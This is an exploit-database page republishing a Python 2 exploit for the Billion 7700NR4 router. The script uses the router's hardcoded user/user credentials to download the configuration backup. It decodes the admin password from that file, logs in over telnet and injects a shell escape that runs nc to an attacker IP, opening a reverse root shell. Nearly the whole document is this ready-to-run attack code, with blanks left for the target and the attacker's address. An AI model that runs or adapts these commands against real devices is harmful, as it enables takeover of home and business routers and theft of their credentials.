Billion Router 7700NR4 Remote Root Command Execution

2016.10.07
Credit: R-73eN
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

# Title : Billion Router 7700NR4 Remote Root Command Execution # Date : 06/10/2016 # Author : R-73eN # Tested on: Billion Router 7700NR4 # Vendor : http://www.billion.com/ # Vulnerability Description: # This router is a widely used here in Albania. It is given by a telecom provider to the home and bussiness users. # The problem is that this router has hardcoded credentials which "can not be changed" by a normal user. Using these # credentials we don't have to much access but the lack of authentication security we can download the backup and get the admin password. # Using that password we can login to telnet server and use a shell escape to get a reverse root connection. # You must change host with the target and reverse_ip with your attacking ip. # Fix: # The only fix is hacking your router with this exploit, changing the credentials and disabling all the other services using iptables. # import requests import base64 import socket import time host = "" def_user = "user" def_pass = "user" reverse_ip = "" #Banner banner = "" banner +=" ___ __ ____ _ _ \n" banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n" banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n" banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n" banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n" print banner # limited shell escape evil = 'ping ;rm /tmp/backpipe;cd tmp;echo "mknod backpipe p && nc ' + reverse_ip + ' 1337 0<backpipe | /bin/sh 1>backpipe &" > /tmp/rev.sh;chmod +x rev.sh;sh /tmp/rev.sh &' def execute_payload(password): print "[+] Please run nc -lvp 1337 and then press any key [+]" raw_input() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,23)) s.recv(1024) s.send("admin\r") a= s.recv(1024) time.sleep(1) s.send(password +"\r") time.sleep(1) s.recv(1024) s.send(evil + "\r") time.sleep(1) print "[+] If everything worked you should get a reverse shell [+]" print "[+] Warning pressing any key will close the SHELL [+]" raw_input() r = requests.get("http://" + host + "/backupsettings.conf" , auth=(def_user,def_pass)) if(r.status_code == 200): print "[+] Seems the exploit worked [+]" print "[+] Dumping data . . . [+]" temp = r.text admin_pass = temp.split("<AdminPassword>")[1].split("</AdminPassword>")[0] # print "[+] Admin password : " + str(base64.b64decode(admin_pass)) + " [+]" execute_payload(str(base64.b64decode(admin_pass))) else: print "[-] Exploit Failed [-]" print "\n[+] https://www.infogen.al/ [+]\n\n"


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top